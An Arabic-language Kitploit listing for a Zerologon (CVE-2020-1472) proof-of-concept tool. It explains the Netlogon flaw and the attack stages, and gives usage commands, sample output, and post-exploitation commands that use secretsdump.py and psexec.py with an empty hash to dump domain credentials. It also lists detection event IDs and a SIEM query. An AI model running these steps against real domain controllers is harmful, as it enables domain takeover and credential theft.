Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ZeroLogon-PoC-DC-Pwn — تطبيق إثبات المفهوم لثغرة Zerologon (CVE-2020-1472) - أداة استغلال ثغرة أمنية حرجة في Active Directory. | Kitploit
أدوات/GitHubGitHub/mods20hh/zerologon-poc-dc-pwn
تصعيد الامتيازاتهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالأوراق والأبحاثالتعلم والتعليمالفريق الأحمر
GitHubmods20hh/zerologon-poc-dc-pwn

ZeroLogon-PoC-DC-Pwn

تطبيق إثبات المفهوم لثغرة Zerologon (CVE-2020-1472) - أداة استغلال ثغرة أمنية حرجة في Active Directory.

43منذ 25 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

Zerologon (CVE-2020-1472)

نظرة عامة

هذا المشروع هو تنفيذ لثغرة Zerologon (CVE-2020-1472)، وهي واحدة من أخطر ثغرات أمنية في Active Directory. تسمح هذه الثغرة لمهاجم غير مصادق باختراق نطاق Active Directory بالكامل عن طريق إعادة تعيين كلمة مرور حساب الآلة لوحدة تحكم المجال.

درجة CVSS: 10.0 (حرجة)

ما هي Zerologon؟

Zerologon هي خلل تشفيري في بروتوكول Netlogon البعيد من Microsoft (MS-NRPC). توجد الثغرة في الطريقة التي يستخدم بها Netlogon تشفير AES-CFB8 مع ناقل تهيئة (IV) ثابت بقيمة صفر.

الملخص الفني:

  • يستخدم بروتوكول Netlogon آلية مصادقة قائمة على التحدي والاستجابة
  • بسبب التنفيذ غير السليم للتشفير، فإن التحدي المكوّن من أصفار بالكامل لديه احتمال 1/256 لإنتاج مصادقة صالحة
  • يمكن للمهاجم إرسال حوالي 2000 محاولة مصادقة لاستغلال هذا الخلل بشكل موثوق
  • بمجرد المصادقة، يمكن للمهاجم إعادة تعيين كلمة مرور حساب الآلة لوحدة تحكم المجال إلى قيمة معروفة (تجزئة فارغة)

كيف يعمل

root@kitploit:~
1. اختيار الهدف
   └─> تحديد وحدة تحكم المجال (FQDN، اسم NetBIOS، حساب الآلة)

2. مرحلة التحدي (I_NetServerReqChallenge)
   └─> إرسال تحدي العميل المكوّن من أصفار (0x0000000000000000)
   └─> استلام تحدي الخادم

3. مرحلة المصادقة (I_NetServerAuthenticate2)
   └─> محاولة المصادقة ببيانات اعتماد فارغة
   └─> تكرار المحاولة حتى النجاح (~1/256 معدل نجاح لكل محاولة)

4. مرحلة إعادة تعيين كلمة المرور (I_NetServerPasswordSet2)
   └─> إعادة تعيين كلمة مرور حساب آلة وحدة التحكم إلى فارغة
   └─> تجزئة NT الجديدة: 31d6cfe0d16ae931b73c59d7e0c089c0 (كلمة مرور فارغة)

5. ما بعد الاستغلال
   └─> استخدام Pass-the-Hash مع بيانات اعتماد فارغة
   └─> تحقيق اختراق كامل للنطاق

بناء المشروع

المتطلبات الأساسية

  • بيئة تطوير Windows (Windows 10/11)
  • Visual Studio 2022
  • Windows SDK

الترجمة (البناء)

باستخدام Visual Studio:

root@kitploit:~
1. افتح Visual Studio
2. اختر **Build Solution** من قائمة **Build**.

الاستخدام

root@kitploit:~
Zerologon.exe <DC_FQDN> <DC_NetBIOS_Name> <Machine_Account_Name>

مثال:

root@kitploit:~
Zerologon.exe DC01.corp.example.com DC01 DC01$

المعاملات:

  • DC_FQDN: اسم النطاق المؤهل بالكامل لوحدة تحكم المجال الهدف
  • DC_NetBIOS_Name: اسم NetBIOS لوحدة التحكم (عادةً اسم المضيف)
  • Machine_Account_Name: اسم حساب الآلة (يجب أن ينتهي بـ $)

المخرجات المتوقعة:

استغلال ناجح:

root@kitploit:~
[+] Targeting Domain Controller:
    FQDN           : DC01.corp.example.com
    NetBIOS Name   : DC01
    Machine Account: DC01$

[+] SUCCESS: Machine account password reset to empty!
[+] Now use Pass-the-Hash with:
      .\DC01$:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[+] Then run: secretsdump.py -just-dc <domain>/<dc_account>@<dc_ip>

فشل الاستغلال (نظام مطبّق عليه التحديث):

root@kitploit:~
[-] Attack failed after 2000 attempts. Target likely patched.

ما بعد الاستغلال

بعد إعادة تعيين كلمة مرور وحدة التحكم بنجاح، يمكنك:

  1. تفريغ بيانات اعتماد النطاق:
root@kitploit:~
secretsdump.py -no-pass -just-dc 'DOMAIN/DC01$'@192.168.1.10
  1. مصادقة Pass-the-Hash:
root@kitploit:~
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC01$'@DC01

الكشف

الكشف عبر الشبكة:

  • محاولات مصادقة Netlogon فاشلة متعددة من مصدر واحد
  • أنماط غير عادية في حركة مرور MS-NRPC
  • توقيعات IDS/IPS لاستغلال Zerologon

الكشف عبر السجلات:

root@kitploit:~
Event Viewer → Windows Logs → System
- Event ID 5827: Multiple password validation failures
- Event ID 5829: Secure channel reset

استعلامات SIEM:

root@kitploit:~
source="WinEventLog:System" EventCode=5827 OR EventCode=5829
| stats count by Computer, SourceIP
| where count > 100

إخلاء المسؤولية

هذه الأداة مقدمة لأغراض البحث الأمني التعليمي والمصرح به فقط.

لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذا الكود.

المراجع

الموارد الرسمية:

  • CVE-2020-1472 - NIST
  • Microsoft Security Advisory
  • Secura Research Paper

التحليل الفني:

  • Microsoft Netlogon Protocol Specification
  • Zerologon Technical Deep Dive

الأدوات:

  • Impacket Toolkit - للاستغلال اللاحق
  • Mimikatz - لاستخراج بيانات الاعتماد

الترخيص

هذا المشروع مرخص بموجب رخصة MIT. لمزيد من المعلومات، راجع ملف الترخيص.

تنزيل الأداة